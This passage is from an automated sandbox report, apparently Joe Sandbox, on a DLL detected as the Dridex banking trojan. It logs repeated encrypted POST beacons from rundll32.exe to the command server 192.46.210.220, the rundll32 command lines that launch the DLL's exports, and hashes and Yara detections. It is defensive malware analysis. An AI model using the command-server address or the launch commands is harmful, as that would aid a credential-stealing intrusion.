2021-10-28 02:53:42 UTC | 412                | OUT       | Data Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                        |                    |           | Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:53:43 UTC | 417                | IN        | HTTP/1.1 403 Forbidden
                        |                    |           | Server: nginx/1.15.12
                        |                    |           | Date: Thu, 28 Oct 2021 02:53:43 GMT
                        |                    |           | Content-Type: text/plain; charset=utf-8
                        |                    |           | Connection: close


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
84         | 192.168.2.5 | 50127       | 192.46.210.220 | 443              | C:\Windows\SysWOW64\rundll32.exe

Timestamp               | kBytes transferred | Direction | Data
2021-10-28 02:53:44 UTC | 417                | OUT       | POST / HTTP/1.1
                        |                    |           | Host: 192.46.210.220
                        |                    |           | Content-Length: 4832
                        |                    |           | Connection: Close
                        |                    |           | Cache-Control: no-cache
2021-10-28 02:53:44 UTC | 417                | OUT       | Data Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                        |                    |           | Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:53:45 UTC | 422                | IN        | HTTP/1.1 403 Forbidden
                        |                    |           | Server: nginx/1.15.12
                        |                    |           | Date: Thu, 28 Oct 2021 02:53:45 GMT
                        |                    |           | Content-Type: text/plain; charset=utf-8
                        |                    |           | Connection: close


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
85         | 192.168.2.5 | 50131       | 192.46.210.220 | 443              | C:\Windows\SysWOW64\rundll32.exe

Timestamp               | kBytes transferred | Direction | Data
2021-10-28 02:53:46 UTC | 422                | OUT       | POST / HTTP/1.1
                        |                    |           | Host: 192.46.210.220
                        |                    |           | Content-Length: 4844
                        |                    |           | Connection: Close
                        |                    |           | Cache-Control: no-cache
2021-10-28 02:53:46 UTC | 422                | OUT       | Data Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                        |                    |           | Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:53:47 UTC | 427                | IN        | HTTP/1.1 403 Forbidden
                        |                    |           | Server: nginx/1.15.12
                        |                    |           | Date: Thu, 28 Oct 2021 02:53:47 GMT
                        |                    |           | Content-Type: text/plain; charset=utf-8
                        |                    |           | Connection: close


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
86         | 192.168.2.5 | 50135       | 192.46.210.220 | 443              | C:\Windows\SysWOW64\rundll32.exe

Timestamp               | kBytes transferred | Direction | Data
2021-10-28 02:53:48 UTC | 427                | OUT       | POST / HTTP/1.1
                        |                    |           | Host: 192.46.210.220
                        |                    |           | Content-Length: 4832
                        |                    |           | Connection: Close
                        |                    |           | Cache-Control: no-cache
2021-10-28 02:53:48 UTC | 427                | OUT       | Data Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                        |                    |           | Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:53:49 UTC | 432                | IN        | HTTP/1.1 403 Forbidden
                        |                    |           | Server: nginx/1.15.12
                        |                    |           | Date: Thu, 28 Oct 2021 02:53:49 GMT
                        |                    |           | Content-Type: text/plain; charset=utf-8
                        |                    |           | Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        87192.168.2.550139192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:53:50 UTC432OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
2021-10-28 02:53:50 UTC  432                 OUT        Data Raw: (hex dump and ASCII rendering of the 4844-byte POST body omitted)
2021-10-28 02:53:51 UTC  437                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:53:51 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
88          192.168.2.5  50143        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:53:52 UTC  437                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4832
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:53:52 UTC  437                 OUT        Data Raw: (hex dump and ASCII rendering of the 4832-byte POST body omitted)
2021-10-28 02:53:53 UTC  442                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:53:53 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
89          192.168.2.5  50147        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:53:54 UTC  442                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4844
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:53:54 UTC  442                 OUT        Data Raw: (hex dump and ASCII rendering of the 4844-byte POST body omitted)
2021-10-28 02:53:55 UTC  447                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:53:55 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
9           192.168.2.5  49789        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:51:17 UTC  44                  OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4832
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:51:17 UTC  44                  OUT        Data Raw: (hex dump and ASCII rendering of the 4832-byte POST body omitted)
2021-10-28 02:51:18 UTC  54                  IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:51:17 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
90          192.168.2.5  50151        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:53:56 UTC  447                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4832
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:53:56 UTC  447                 OUT        Data Raw: (hex dump and ASCII rendering of the 4832-byte POST body omitted)
2021-10-28 02:53:57 UTC  452                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:53:57 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
91          192.168.2.5  50155        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:53:58 UTC  452                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4844
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:53:58 UTC  452                 OUT        Data Raw: (hex dump and ASCII rendering of the 4844-byte POST body omitted)
2021-10-28 02:53:59 UTC  457                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:53:59 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


                                                                                                        Code Manipulations

                                                                                                        Statistics

                                                                                                        Behavior


                                                                                                        System Behavior

                                                                                                        General

Start time: 04:49:53
Start date: 28/10/2021
Path: C:\Windows\System32\loaddll32.exe
Wow64 process (32bit): true
Commandline: loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28061.dll'
Imagebase: 0x13a0000
File size: 893440 bytes
MD5 hash: 72FCD8FB0ADC38ED9050569AD673650E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000000.00000002.771060361.000000006EB91000.00000020.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000000.00000003.373914739.00000000016F0000.00000040.00000001.sdmp, Author: Joe Security
Reputation: moderate

                                                                                                        General

Start time: 04:49:54
Start date: 28/10/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28061.dll',#1
Imagebase: 0x150000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                                        General

Start time: 04:49:55
Start date: 28/10/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28061.dll,Bluewing
Imagebase: 0x1310000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000003.323665839.0000000000ED0000.00000040.00000010.sdmp, Author: Joe Security
Reputation: high

                                                                                                        General

Start time: 04:49:55
Start date: 28/10/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28061.dll',#1
Imagebase: 0x1310000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000004.00000003.326244435.0000000004CB0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000004.00000002.772113565.000000006EB91000.00000020.00020000.sdmp, Author: Joe Security
Reputation: high

                                                                                                        General

Start time: 04:50:00
Start date: 28/10/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28061.dll,Earth
Imagebase: 0x1310000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000005.00000003.362350456.0000000000CE0000.00000040.00000001.sdmp, Author: Joe Security
Reputation: high

                                                                                                        General

Start time: 04:50:11
Start date: 28/10/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28061.dll,Masterjust
Imagebase: 0x1310000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000007.00000003.370833938.0000000004CA0000.00000040.00000001.sdmp, Author: Joe Security
Reputation: high

                                                                                                        Disassembly

                                                                                                        Code Analysis
